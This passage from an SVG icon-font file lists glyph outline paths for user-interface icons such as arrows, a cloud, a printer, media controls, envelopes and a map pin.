21.142-0.259-6.938-0.4-13.977-0.4-21.116-0.001-7.141 0.141-14.18 0.4-21.11zM187.539 280.87c1.841 16.702 4.465 32.203 7.688 46.407 13.436-4.448 27.423-9.938 41.65-16.394-8.305-4.482-16.635-9.229-24.923-14.269-8.439-5.132-16.568-10.397-24.415-15.744zM275.312 310.882c11.787 5.348 23.407 10.046 34.695 14.028 2.632-12.003 4.881-24.865 6.555-38.635-5.323 3.499-10.754 6.948-16.326 10.338-8.288 5.040-16.619 9.788-24.924 14.269zM336.63 251.139c11.862-9.046 22.774-18.143 32.421-27.139-9.647-8.989-20.559-18.085-32.421-27.131 0.433 8.871 0.683 17.918 0.683 27.131 0.001 9.212-0.249 18.259-0.683 27.139zM252.338 420.19c19.435 0 40.168-29.639 53.546-78.553-16.094-5.598-32.829-12.629-49.789-20.9-19.393 9.455-38.469 17.268-56.645 23.199 13.396 47.532 33.763 76.254 52.888 76.254zM88.436 325.885c7.222 11.887 25.323 14.386 39.243 14.386 14.777 0 32.204-2.832 51.114-8.022-4.524-19.642-7.848-41.334-9.705-64.533-13.987-10.447-26.79-21.125-38.219-31.838-7.305 7.481-14.003 14.961-19.85 22.391-22.85 28.998-31.080 53.638-22.583 67.616zM127.67 107.72c-13.912 0-32.012 2.499-39.235 14.378-10.404 17.127 5.248 51.755 42.458 89.957 11.562-10.771 24.399-21.375 38.185-31.671 1.849-23.241 5.181-44.966 9.713-64.641-18.908-5.183-36.335-8.023-51.121-8.023zM252.338 27.81c-19.125 0-39.492 28.721-52.888 76.245 18.177 5.939 37.261 13.745 56.645 23.208 16.96-8.272 33.695-15.302 49.789-20.908-13.378-48.915-34.111-78.545-53.546-78.545zM423.746 122.098c-7.222-11.879-25.315-14.378-39.227-14.378-16.61 0-36.527 3.566-58.177 10.047 3.915 17.426 6.873 36.435 8.73 56.644 17.127 12.287 32.612 24.965 46.19 37.668 37.228-38.21 52.888-72.854 42.484-89.981z" />
<glyph unicode="&#xe61a;" d="M93.926 428.72v-409.44l162.070 119.42 162.078-119.42v409.44h-324.148zM401.014 53.042l-145.018 106.85-145.010-106.85v358.618h290.028v-358.618zM170.696 326.36h170.604v-17.060h-170.604v17.060zM170.696 258.12h170.604v-17.060h-170.604v17.060z" />
<glyph unicode="&#xe61b;" d="M434.888 112.818h-359.959l71.872 71.897-12.062 12.062-91.881-91.905 91.881-91.89 12.062 12.063-70.706 70.713h375.853v153.54h-17.060zM76.695 334.598h359.81l-71.289-71.305 12.061-12.062 91.865 91.88-91.881 91.907-12.062-12.063 71.272-71.297h-376.836v-153.54h17.060z" />
<glyph unicode="&#xe61c;" d="M443.66 181.371c0-103.477-84.183-187.66-187.66-187.66-103.476 0-187.66 84.183-187.66 187.66 0 103.234 83.8 187.251 186.952 187.643v-85.325l162.070 93.839-162.070 93.821v-85.275c-112.756-0.383-204.012-91.855-204.012-204.703 0-113.047 91.639-204.72 204.72-204.72 113.064 0 204.72 91.673 204.72 204.72h-17.060zM272.352 441.761l110.957-64.233-110.957-64.25v128.483z" />
<glyph unicode="&#xe61d;" d="M418.316 249.682c0.033 1.366 0.2 2.682 0.2 4.048 0 73.021-59.194 132.215-132.215 132.215-52.613 0-97.912-30.804-119.196-75.287-9.205 4.632-19.567 7.297-30.572 7.297-33.769 0-61.742-24.574-67.207-56.794-40.216-13.795-69.18-51.847-69.18-96.763 0-56.494 45.79-102.293 102.268-102.343l316.102 0.016c51.596 0.267 93.338 42.15 93.338 93.797 0 51.73-41.841 93.664-93.538 93.814zM418.424 79.131l-3.723-0.016h-312.27c-46.99 0.049-85.225 38.301-85.225 85.283 0 36.403 23.174 68.806 57.653 80.636l9.596 3.281 1.691 9.996c4.182 24.674 25.373 42.583 50.388 42.583 7.972 0 15.677-1.849 22.9-5.481l15.553-7.813 7.505 15.693c19.068 39.851 59.818 65.591 103.81 65.591 63.5 0 115.155-51.647 115.155-115.155 0-0.35-0.042-0.717-0.067-1.066-0.049-0.85-0.107-1.699-0.125-2.566l-0.433-17.41 17.435-0.067c42.2-0.117 76.528-34.553 76.528-76.754-0.001-42.082-34.263-76.518-76.371-76.735zM255.996 138.825c-32.92 0-59.71 26.773-59.71 59.71 0 32.921 26.79 59.71 59.71 59.71v-31.505l64.2 37.069-64.2 37.086v-25.59c-42.4 0-76.77-34.37-76.77-76.77s34.37-76.77 76.77-76.77c42.392 0 76.77 34.37 76.77 76.77h-17.060c0-32.937-26.79-59.71-59.71-59.71z" />
<glyph unicode="&#xe61e;" d="M449.825 334.434c-0.175 0.058-0.308 0.191-0.491 0.233l-361.976 85.3c-4.589 1.058-9.188-1.766-10.262-6.347-1.075-4.59 1.766-9.18 6.348-10.263l290.536-68.464h-307.314c-13.204 0-23.916-10.704-23.916-23.916v-259.257c0-13.203 10.713-23.907 23.916-23.907h378.668c13.212 0 23.916 10.704 23.916 23.907v259.256c0 11.67-8.363 21.358-19.425 23.458zM452.19 51.719c0-3.774-3.073-6.847-6.856-6.847h-378.668c-3.782 0-6.856 3.073-6.856 6.847v259.257c0 3.781 3.074 6.856 6.856 6.856h378.668c3.782 0 6.856-3.074 6.856-6.856v-259.257zM196.223 198.419c-7.064 0-12.811-5.73-12.811-12.795 0-7.047 5.748-12.795 12.811-12.795 7.047 0 12.779 5.748 12.779 12.795 0 7.065-5.731 12.795-12.779 12.795zM102.46 185.624c0 7.065-5.748 12.795-12.803 12.795-7.048 0-12.787-5.73-12.787-12.795 0-7.047 5.74-12.795 12.787-12.795 7.055 0 12.803 5.749 12.803 12.795zM302.924 198.419c-7.047 0-12.804-5.73-12.804-12.795 0-7.047 5.757-12.795 12.804-12.795 7.072 0 12.786 5.748 12.786 12.795 0 7.065-5.714 12.795-12.786 12.795zM149.367 173.538c-7.048 0-12.787-5.731-12.787-12.787s5.74-12.803 12.787-12.803c7.055 0 12.803 5.747 12.803 12.803s-5.748 12.787-12.803 12.787zM256 160.034c0 7.056-5.73 12.787-12.795 12.787-7.047 0-12.795-5.731-12.795-12.787s5.748-12.803 12.795-12.803c7.065 0.001 12.795 5.748 12.795 12.803zM149.367 224.002c-7.048 0-12.787-5.74-12.787-12.787 0-7.072 5.74-12.803 12.787-12.803 7.055 0 12.803 5.73 12.803 12.803 0 7.047-5.748 12.787-12.803 12.787zM243.205 198.412c7.065 0 12.795 5.73 12.795 12.803 0 7.047-5.73 12.787-12.795 12.787-7.047 0-12.795-5.74-12.795-12.787 0-7.073 5.748-12.803 12.795-12.803zM106.725 146.998c-7.055 0-12.795-5.73-12.795-12.795s5.74-12.795 12.795-12.795c7.047 0 12.795 5.731 12.795 12.795s-5.748 12.795-12.795 12.795zM285.864 146.998c-7.072 0-12.804-5.73-12.804-12.795s5.731-12.795 12.804-12.795c7.056 0 12.786 5.731 12.786 12.795s-5.73 12.795-12.786 12.795zM106.725 249.592c-7.055 0-12.795-5.748-12.795-12.804s5.74-12.786 12.795-12.786c7.047 0 12.795 5.73 12.795 12.786 0 7.055-5.748 12.804-12.795 12.804zM285.864 224.002c7.056 0 12.786 5.73 12.786 12.786 0 7.055-5.73 12.804-12.786 12.804-7.072 0-12.804-5.748-12.804-12.804s5.731-12.786 12.804-12.786zM140.196 113.112c-7.039 0-12.795-5.731-12.795-12.787s5.756-12.803 12.795-12.803c7.081 0 12.795 5.748 12.795 12.803s-5.714 12.787-12.795 12.787zM251.402 113.112c-7.056 0-12.795-5.731-12.795-12.787s5.739-12.803 12.795-12.803c7.064 0 12.795 5.748 12.795 12.803s-5.731 12.787-12.795 12.787zM140.845 258.122c7.081 0 12.795 5.73 12.795 12.786 0 7.072-5.714 12.804-12.795 12.804-7.038 0-12.795-5.731-12.795-12.804 0-7.056 5.757-12.786 12.795-12.786zM251.402 283.712c-7.056 0-12.795-5.731-12.795-12.804 0-7.056 5.739-12.786 12.795-12.786 7.064 0 12.795 5.73 12.795 12.786 0 7.072-5.731 12.804-12.795 12.804zM196.216 146.998c-7.056 0-12.804-5.73-12.804-12.795 0-7.047 5.748-12.795 12.804-12.795 7.055 0 12.786 5.748 12.786 12.795 0 7.064-5.731 12.795-12.786 12.795zM196.216 96.068c-7.056 0-12.804-5.748-12.804-12.804s5.748-12.803 12.804-12.803c7.055 0 12.786 5.748 12.786 12.803s-5.731 12.804-12.786 12.804zM196.216 249.592c-7.056 0-12.804-5.748-12.804-12.804s5.748-12.786 12.804-12.786c7.055 0 12.786 5.73 12.786 12.786 0 7.055-5.731 12.804-12.786 12.804zM196.216 300.772c-7.056 0-12.804-5.731-12.804-12.787s5.748-12.803 12.804-12.803c7.055 0 12.786 5.748 12.786 12.803s-5.731 12.787-12.786 12.787zM392.497 283.712c-14.128 0-25.607-11.454-25.607-25.582s11.479-25.581 25.607-25.581c14.111 0 25.573 11.454 25.573 25.581 0 14.128-11.462 25.582-25.573 25.582zM392.497 249.608c-4.715 0-8.547 3.824-8.547 8.521s3.833 8.522 8.547 8.522c4.698 0 8.513-3.824 8.513-8.522s-3.815-8.521-8.513-8.521zM392.497 215.472c-14.128 0-25.607-11.454-25.607-25.582s11.479-25.581 25.607-25.581c14.111 0 25.573 11.454 25.573 25.581s-11.462 25.582-25.573 25.582zM392.497 181.368c-4.715 0-8.547 3.824-8.547 8.521s3.833 8.522 8.547 8.522c4.698 0 8.513-3.824 8.513-8.522s-3.815-8.521-8.513-8.521z" />
<glyph unicode="&#xe61f;" d="M119.52 283.71c-9.43 0-17.060-7.639-17.060-17.060s7.63-17.060 17.060-17.060c9.413 0 17.060 7.639 17.060 17.060s-7.647 17.060-17.060 17.060zM170.7 283.71c-9.43 0-17.060-7.639-17.060-17.060s7.63-17.060 17.060-17.060c9.413 0 17.060 7.639 17.060 17.060s-7.647 17.060-17.060 17.060zM469.25 351.95h-93.83v85.3h-238.84v-85.3h-93.83c-4.715 0-8.53-3.815-8.53-8.53v-255.9c0-4.715 3.815-8.53 8.53-8.53h93.83v-68.24h238.84v68.24h93.83c4.714 0 8.53 3.815 8.53 8.53v255.9c0 4.715-3.816 8.53-8.53 8.53zM153.64 420.19h204.72v-68.24h-204.72v68.24zM358.36 27.81h-204.72v153.54h204.72v-153.54zM460.72 96.050h-85.3v102.36h-238.84v-102.36h-85.3v238.84h409.44v-238.84z" />
<glyph unicode="&#xe620;" d="M256 224.009l238.84-136.489v272.96l-238.84-136.471zM477.78 116.917l-187.394 107.092 187.394 107.074v-214.166zM17.16 224.009l238.84-136.489v272.96l-238.84-136.471zM238.94 116.917l-187.394 107.092 187.394 107.074v-214.166z" />
<glyph unicode="&#xe621;" d="M244.888 437.25h17.060v-204.72h-17.060v204.72zM338.718 402.731v-18.868c62.101-30.63 104.942-94.596 104.942-168.392 0-103.476-84.183-187.66-187.66-187.66-103.476 0-187.66 84.184-187.66 187.66 0 71.739 40.477 134.173 99.778 165.744v19.183c-69.081-32.888-116.838-103.318-116.838-184.928 0-113.064 91.657-204.72 204.72-204.72s204.72 91.656 204.72 204.72c0 83.618-50.155 155.481-122.002 187.261z" />
<glyph unicode="&#xe622;" d="M315.71 364.745v42.65h-119.42v-42.65h-145.010v-324.14h409.44v324.14h-145.010zM213.35 390.335h85.3v-25.59h-85.3v25.59zM196.29 347.685h247.37v-136.48h-127.95v34.12h-119.42v-34.12h-127.95v136.48h127.95zM298.65 228.265v-51.18h-85.3v51.18h85.3zM68.34 57.665v136.48h127.95v-34.12h119.42v34.12h127.95v-136.48h-375.32z" />
<glyph unicode="&#xe623;" d="M256 437.248c-117.787 0-213.25-95.463-213.25-213.25s95.463-213.246 213.25-213.246c117.788 0 213.25 95.458 213.25 213.246s-95.462 213.25-213.25 213.25zM256 27.812c-108.174 0-196.19 88.012-196.19 196.186s88.016 196.19 196.19 196.19c108.174 0 196.19-88.015 196.19-196.19 0-108.174-88.016-196.186-196.19-196.186zM264.53 351.948h-17.060v-119.42h-118.854v-17.060h118.854v-118.854h17.060v118.854h119.42v17.060h-119.42z" />
<glyph unicode="&#xe624;" d="M119.52 373.425l256.158-149.425-256.158-149.424v298.849zM102.46 403.13v-358.26l307.080 179.13-307.080 179.13z" />
<glyph unicode="&#xe625;" d="M145.974-7.426l-21.276 100.294-101.084 22.349 20.65 39.593 92.555 5.057c4.749 6.181 15.361 19.742 21.992 26.365l84.334 84.342-175.823 86.208 44.516 44.507 222.913-39.102 78.928 78.928c9.355 9.363 23.932 14.311 42.15 14.311 12.42 0 22.316-2.283 22.732-2.382l4.798-1.124 1.424-4.715c7.497-24.807 2.99-52.771-10.713-66.482l-79.302-79.303 38.951-222.004-44.508-44.516-85.866 175.115-78.769-78.786c-8.28-8.28-25.964-24.574-32.529-30.589l-6.889-86.807-39.184-21.259zM49.037 127.063l90.073-19.901 18.81-88.699 10.962 5.948 6.689 84.284 2.482 2.266c0.25 0.225 24.674 22.541 34.453 32.321l95.655 95.671 85.866-175.115 21.35 21.358-38.951 222.021 85.583 85.567c7.43 7.43 11.928 25.564 7.738 44.524-3.449 0.516-8.413 1.058-13.919 1.058-9.48 0-22.391-1.616-30.089-9.313l-85.192-85.208-222.928 39.101-21.358-21.35 175.823-86.208-101.211-101.22c-7.721-7.713-22.691-27.547-22.841-27.739l-2.391-3.165-90.748-4.964-5.856-11.237z" />
<glyph unicode="&#xe626;" d="M426.598 343.42v68.24h-400.906v-307.080h59.71v-68.24h400.906v307.080h-59.71zM42.752 121.64v272.96h366.786v-51.18h-324.136v-221.78h-42.65zM469.248 53.4h-366.786v272.96h366.786v-272.96z" />
<glyph unicode="&#xe627;" d="M369.381 454.31h-226.761c-12.754 0-23.1-10.355-23.1-23.108v-414.413c0-12.77 10.346-23.099 23.1-23.099h226.761c12.754 0 23.099 10.329 23.099 23.099v414.413c0 12.753-10.345 23.108-23.099 23.108zM375.42 16.789c0-3.332-2.707-6.039-6.039-6.039h-226.761c-3.333 0-6.040 2.707-6.040 6.039v79.202h238.84v-79.202zM375.42 113.051h-238.84v272.669h238.84v-272.669zM375.42 402.78h-238.84v28.422c0 3.332 2.707 6.048 6.040 6.048h226.761c3.333 0 6.039-2.716 6.039-6.048v-28.422zM230.41 61.93h51.18v-17.060h-51.18v17.060z" />
<glyph unicode="&#xe628;" d="M492.341 387.17l-68.023 68.015-16.644-16.651-23.291 23.274c-3.332 3.332-8.73 3.332-12.061 0l-138.214-138.222c-3.332-3.333-3.332-8.73 0-12.062 1.667-1.666 3.849-2.499 6.032-2.499 2.182 0 4.365 0.833 6.031 2.499l132.182 132.19 17.26-17.243-293.103-293.094 19.759-19.767c-8.313 4.115-17.376 6.214-26.44 6.214-15.31 0-30.621-5.84-42.3-17.527-1.199-1.183-2.349-2.466-3.449-3.807-0.549-0.641-1.066-1.308-1.566-1.974-0.6-0.75-1.166-1.541-1.715-2.333-0.417-0.583-0.833-1.15-1.216-1.732-24.807-37.294-25.923-108.624-25.923-108.624s2.599-0.133 7.097-0.133c20.492 0 80.152 2.807 111.373 34.020 18.593 18.601 22.341 46.398 11.295 68.748l21.108-21.1 321.808 321.808zM126.067 29.776c-19.042-19.034-52.446-25.606-76.27-27.856l38.836 38.835-12.063 12.062-37.202-37.202c3.032 22.757 9.063 50.33 20.476 67.465l0.483 0.682 0.416 0.592c0.367 0.533 0.75 1.082 1.416 1.924 0.283 0.374 0.566 0.749 1.066 1.349 0.75 0.899 1.517 1.766 2.366 2.607 8.080 8.080 18.81 12.529 30.238 12.529 11.412 0 22.158-4.448 30.238-12.529 16.661-16.667 16.661-43.79 0-60.458zM468.218 387.17l-101.178-101.178-43.9 43.891 101.178 101.178 43.9-43.891zM311.079 317.822l43.9-43.891-184.446-184.445-43.899 43.891 184.445 184.445z" />
<glyph unicode="&#xe629;" d="M198.064 164.206l76.262-153.456 194.899 426.5-426.45-204.67 155.289-68.374zM202.596 180.834l-119.045 52.413 326.938 156.905-207.893-209.318zM273.693 50.151l-59.002 118.738 209.743 211.166-150.741-329.904z" />
<glyph unicode="&#xe62a;" d="M447.925 394.6v26.456c0 23.075-18.71 41.784-41.784 41.784h-274.676c-23.074 0-41.767-18.71-41.767-41.784v-26.456h-7.831c-19.259 0-34.853-15.611-34.853-34.862v-58.385c0-19.251 15.594-34.861 34.853-34.861l160.588 0.050c9.813 0 17.81-7.989 17.81-17.802v-58.86h-34.104v-204.72h85.3v204.72h-34.136v58.86c0 19.251-15.611 34.862-34.87 34.862h-21.125v-0.050h-139.462c-9.813 0-17.793 7.988-17.793 17.801v58.385c0 9.813 7.98 17.802 17.793 17.802h7.831v-26.465c0-23.075 18.693-41.775 41.767-41.775h274.675c23.075 0 41.784 18.7 41.784 41.775v26.465h17.060v17.060h-17.060zM294.401 2.22h-51.18v170.6h51.18v-170.6zM430.865 351.075c0-13.628-11.096-24.715-24.724-24.715h-274.676c-13.628 0-24.707 11.087-24.707 24.715v69.981c0 13.636 11.079 24.724 24.707 24.724h274.675c13.628 0 24.724-11.088 24.724-24.724v-69.981z" />
<glyph unicode="&#xe62b;" d="M256 428.72h-136.48c-40.818 0-68.24-27.422-68.24-68.24v-283.731c0-13.477 5.022-57.469 69.705-57.469h339.735v409.44h-204.72zM238.94 411.66v-163.194l-41.784 38.051-46.39-39.034v164.177h88.174zM119.52 411.66h14.186v-200.829l63 53.012 59.294-53.987v201.804h187.66v-281.49h-324.14c-21.709 0-39.318-6.48-51.18-17.81v248.12c0 31.088 20.092 51.18 51.18 51.18zM120.985 36.34c-39.109 0-50.413 17.743-52.304 34.721 0.033 26.331 19.026 42.049 50.839 42.049h324.14v-76.77h-322.675z" />
<glyph unicode="&#xe62c;" d="M444.473 412.837c-4.998 4.99-11.554 7.488-18.102 7.488-6.555 0-13.103-2.498-18.093-7.488l-75.295-75.287v14.261h-272.96v-324.136h324.14v272.956h-15.693l76.003 76.013c10.005 9.978 10.005 26.196 0 36.193zM367.103 44.735h-290.020v290.016h253.11l-133.69-133.681v-36.919h35.503l135.097 135.114v-254.53zM432.411 388.704l-207.469-207.493h-11.379v12.795l206.786 206.777c2.166 2.166 4.698 2.482 6.022 2.482s3.866-0.324 6.039-2.498c2.183-2.174 2.508-4.715 2.508-6.039 0.001-1.317-0.324-3.841-2.507-6.024z" />
<glyph unicode="&#xe62d;" d="M17.16 360.48v-272.96l238.84 136.489-238.84 136.471zM34.22 331.083l187.394-107.075-187.394-107.091v214.166zM256 360.48v-272.96l238.84 136.489-238.84 136.471zM273.060 331.083l187.394-107.075-187.394-107.091v214.166z" />
<glyph unicode="&#xe62e;" d="M145.11 437.25v-238.84h-102.36c0 0 0-105.425 0-139.495 0-34.078 31.721-48.165 55.228-48.165 23.499 0 260.165 0 320.092 0 25.857 0 51.18 25.149 51.18 51.18 0 18.793 0 375.32 0 375.32h-324.14zM97.978 27.81c-10.621 0-38.168 5.59-38.168 31.105v122.435h85.3v-115.080c0-11.42-14.927-38.46-38.459-38.46h-8.673zM452.19 61.93c0-16.576-17.534-34.12-34.12-34.12h-273.801c11.487 11.971 17.901 27.689 17.901 38.46v353.92h290.020v-358.26zM196.29 386.070h221.78v-17.060h-221.78v17.060zM196.29 155.76h221.78v-17.060h-221.78v17.060zM196.29 96.050h221.78v-17.060h-221.78v17.060zM418.070 326.36h-221.78v-127.95h221.78v127.95zM401.010 215.47h-187.66v93.83h187.66v-93.83z" />
<glyph unicode="&#xe62f;" d="M42.75 343.408h221.78v-17.060h-221.78v17.060zM42.75 266.638h221.78v-17.060h-221.78v17.060zM42.75 189.868h221.78v-17.060h-221.78v17.060zM349.83 333.212l119.42-15.394c0 85.3-68.24 102.36-136.48 119.445v-324.165c-10.212 0-26.456 0-52.563 0-50.138 0-66.857-26.531-66.857-50.764 0-20.558 15.386-51.596 68.24-51.596 75.571 0 68.24 60.676 68.24 102.36v220.114zM450.657 337.419l-100.827 12.994v64.809c56.695-15.353 93.106-32.213 100.827-77.803zM320.275 39.535c-7.68-7.789-20.701-11.737-38.685-11.737-48.714 0-51.18 28.773-51.18 34.536 0 21.417 18.152 33.704 49.797 33.704h52.563v-13.103h0.042c-0.509-17.186-2.949-33.687-12.537-43.4z" />
<glyph unicode="&#xe630;" d="M460.72 456.721l-281.49-99.578v-246.679c-13.303 15.786-33.195 25.84-55.445 25.84-40.035 0-72.505-32.47-72.505-72.521 0-40.035 32.47-72.505 72.505-72.505 39.618 0 71.771 31.804 72.438 71.264h0.067v282.54l247.37 87.516v-228.311c-13.303 15.786-33.195 25.831-55.454 25.831-40.042 0-72.496-32.454-72.496-72.505 0-40.042 32.454-72.505 72.496-72.505s72.514 32.463 72.514 72.505c0 1.374-0.133 2.715-0.208 4.065h0.208v295.043zM123.785 8.339c-30.572 0-55.445 24.873-55.445 55.445 0 30.579 24.873 55.461 55.445 55.461s55.445-24.882 55.445-55.461c0-30.572-24.873-55.445-55.445-55.445zM388.206 102.169c-30.572 0-55.436 24.873-55.436 55.445s24.865 55.445 55.436 55.445c30.58 0 55.454-24.873 55.454-55.445s-24.873-55.445-55.454-55.445z" />
<glyph unicode="&#xe631;" d="M264.53 343.004v26.356c0 7.789 16.46 18.093 29.688 26.382 18.951 11.862 38.552 24.141 38.552 42.026v42.132h-17.060v-42.133c0-8.439-16.935-19.042-30.547-27.572-18.534-11.596-37.693-23.599-37.693-40.835v-26.356c-66.666-4.282-119.42-58.011-119.42-123.827v-126.833c0-68.615 57.286-124.244 127.95-124.244s127.95 55.628 127.95 124.244v126.833c0 65.816-52.755 119.545-119.42 123.827zM366.89 219.177v-12.237h-102.36v119.004c57.16-4.241 102.36-50.448 102.36-106.767zM145.11 219.177c0 56.319 45.199 102.526 102.36 106.767v-119.004h-102.36v12.237zM256-14.84c-61.143 0-110.89 48.081-110.89 107.184v97.536h221.78v-97.536c0-59.103-49.748-107.184-110.89-107.184z" />
<glyph unicode="&#xe632;" d="M51.28 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM51.28 189.88c-18.826 0-34.12 15.302-34.12 34.12s15.294 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12zM460.72 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM460.72 189.88c-18.809 0-34.12 15.302-34.12 34.12s15.311 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12zM256 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM256 189.88c-18.809 0-34.12 15.302-34.12 34.12s15.311 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12z" />
<glyph unicode="&#xe633;" d="M158.105 399.169c-13.545-27.473-20.717-57.819-20.717-89.023 0-111.631 90.822-202.446 202.454-202.446 32.838 0 64.567 7.83 92.989 22.591-34.395-61.901-99.969-101.918-173.799-101.918-109.848 0-199.222 89.365-199.222 199.214 0 71.854 38.552 136.521 98.295 171.582zM204.645 436.687c-93.072-24.139-161.895-108.474-161.895-209.101 0-119.437 96.846-216.274 216.282-216.274 102.194 0 187.611 70.964 210.218 166.218-33.395-32.62-79.019-52.771-129.408-52.771-102.385 0-185.394 83-185.394 185.386 0.001 48.982 19.143 93.406 50.197 126.542v0z" />
<glyph unicode="&#xe634;" d="M477.78 113.11v307.080h-443.56v-307.080h213.25v-68.24h-59.71v-17.060h136.48v17.060h-59.71v68.24h213.25zM51.28 403.13h409.44v-272.96h-409.44v272.96z" />
<glyph unicode="&#xe635;" d="M256.042 121.971c51.691 0 93.61 41.91 93.61 93.61v170.217c0 51.7-41.919 93.602-93.61 93.602s-93.61-41.902-93.61-93.602v-170.216c0-51.7 41.918-93.611 93.61-93.611zM179.452 385.798c0 42.227 34.356 76.582 76.59 76.582s76.59-34.356 76.59-76.582v-170.216c0-42.234-34.356-76.59-76.59-76.59s-76.59 34.356-76.59 76.59v170.216zM383.65 300.69v-85.109c0-70.382-57.26-127.65-127.65-127.65s-127.65 57.268-127.65 127.65v85.109h-17.020v-85.109c0-77.28 60.958-140.415 137.291-144.296h-1.089v-85.665h-76.632v-17.020h170.2v17.020h-76.548v85.665h-1.172c76.333 3.881 137.29 67.016 137.29 144.296v85.109h-17.020z" />
<glyph unicode="&#xe636;" d="M51.28 369.010v-68.24h409.44v68.24h-409.44zM443.66 317.83h-375.32v34.12h375.32v-34.12zM51.28 189.88h409.44v68.24h-409.44v-68.24zM68.34 241.060h375.32v-34.12h-375.32v34.12zM51.28 78.99h409.44v68.24h-409.44v-68.24zM68.34 130.17h375.32v-34.12h-375.32v34.12z" />
<glyph unicode="&#xe637;" d="M368.872 425.596l-10.512 5.256-8.53-4.256v-0.009l-93.83-46.914-102.36 51.18-110.89-55.445v-358.26l110.89 55.445 102.36-51.18 102.36 51.18 110.89-55.445v358.26l-100.378 50.188zM145.11 87.404l-85.3-42.65v320.108l85.3 42.65v-320.108zM247.47 44.754l-85.3 42.65v320.108l85.3-42.65v-320.108zM349.83 87.404l-85.3-42.65v320.108l85.3 42.65v-320.108zM452.19 44.754l-85.3 42.65v320.108l85.3-42.65v-320.108z" />
<glyph unicode="&#xe638;" d="M256.009 462.848c84.659 0 153.531-68.881 153.531-153.548 0-26.923-7.13-53.463-20.633-76.779l-132.907-230.301-132.923 230.318c-13.487 23.3-20.617 49.839-20.617 76.762 0 84.667 68.881 153.548 153.549 153.548zM256.009 249.598c32.921 0 59.701 26.782 59.701 59.702 0 32.911-26.781 59.693-59.701 59.693-32.929 0-59.719-26.782-59.719-59.693 0-32.92 26.789-59.702 59.719-59.702zM256.009 479.908c-94.222 0-170.609-76.403-170.609-170.608 0-31.113 8.371-60.194 22.916-85.309l147.684-255.899 147.684 255.9c14.545 25.115 22.916 54.195 22.916 85.309 0 94.204-76.387 170.607-170.591 170.607v0zM256.009 266.658c-23.557 0-42.659 19.084-42.659 42.642 0 23.532 19.101 42.633 42.659 42.633 23.549 0 42.641-19.101 42.641-42.633 0-23.558-19.093-42.642-42.641-42.642v0z" />
<glyph unicode="&#xe639;" d="M451.898 360.482h-409.148v-272.963h426.5v272.963h-17.352zM434.838 343.422l-164.769-164.769c-7.513-7.513-20.626-7.513-28.139 0l-164.794 164.769h357.702zM59.81 336.625l110.773-110.757-110.773-110.773v221.53zM73.421 104.582l109.233 109.216 47.214-47.207c6.972-6.981 16.261-10.83 26.132-10.83s19.159 3.849 26.132 10.83l47.214 47.214 109.224-109.223h-365.149zM452.19 115.086l-110.773 110.782 110.773 110.782v-221.564z" />
<glyph unicode="&#xe63a;" d="M467.659 266.529l-185.528 185.528c-6.972 6.981-16.26 10.829-26.132 10.829-9.871 0-19.158-3.848-26.131-10.829l-187.118-187.094v-279.849h426.5v279.824l-1.591 1.591zM70.073 268.162l171.858 171.833c7.514 7.514 20.626 7.514 28.14 0l179.938-179.946-122.62-122.62-45.257 45.266c-6.972 6.98-16.26 10.829-26.132 10.829-9.871 0-19.158-3.849-26.131-10.829l-45.932-45.924-122.627 122.628 8.763 8.763zM171.867 124.718l-1.267-1.283-0.016 0.017-110.774-110.765v224.087l112.057-112.056zM73.421 2.174l9.171 9.171h0.026l159.312 159.288c7.514 7.514 20.626 7.514 28.14 0l168.501-168.459h-365.15zM452.19 230.885v-218.207l-112.739 112.69 112.739 112.739v-7.222z" />
<glyph unicode="&#xe63b;" d="M467.659 266.529l-185.527 185.527c-6.972 6.981-16.261 10.829-26.132 10.829s-19.159-3.848-26.132-10.829l-40.451-40.442h-61.359v-61.351l-85.308-85.3v-279.849h426.5v279.824l-1.591 1.591zM450.007 260.048l-66.057-66.057v132.115l66.057-66.058zM241.931 439.995c7.514 7.514 20.626 7.514 28.139 0l28.381-28.38h-84.908l28.388 28.38zM315.51 394.554l51.38-51.388v-166.235l-39.502-39.502-45.257 45.266c-6.972 6.98-16.261 10.829-26.132 10.829s-19.159-3.849-26.132-10.829l-45.931-45.924-38.818 38.818v218.965h170.392zM70.072 268.162l57.986 57.978v-133.49l-66.748 66.749 8.762 8.763zM59.81 223.072v13.702l112.056-112.056-1.266-1.283-0.017 0.017-110.773-110.765v210.385zM73.421 2.174l9.171 9.171h0.025l159.313 159.288c7.514 7.514 20.626 7.514 28.139 0l168.501-168.459h-365.149zM452.19 234.242v-221.564l-112.739 112.69 112.739 112.739v-3.865zM196.29 343.374h119.42v-17.060h-119.42v17.060zM196.29 241.014h119.42v-17.060h-119.42v17.060zM196.29 292.194h85.3v-17.060h-85.3v17.060z" />
<glyph unicode="&#xe63c;" d="M341.517 437.25v-238.623c0-47.231-38.285-85.517-85.517-85.517-47.249 0-85.517 38.285-85.517 85.517v238.623h-102.143v-238.84c0-103.643 84.017-187.66 187.66-187.66s187.66 84.017 187.66 187.66v238.84h-102.143zM426.6 420.19v-51.18h-68.023v51.18h68.023zM153.423 420.19v-51.18h-68.023v51.18h68.023zM256 27.81c-94.080 0-170.6 76.528-170.6 170.6v153.54h68.023v-153.323c0-56.562 46.015-102.577 102.577-102.577 56.561 0 102.577 46.015 102.577 102.577v153.323h68.023v-153.54c0-94.072-76.537-170.6-170.6-170.6z" />
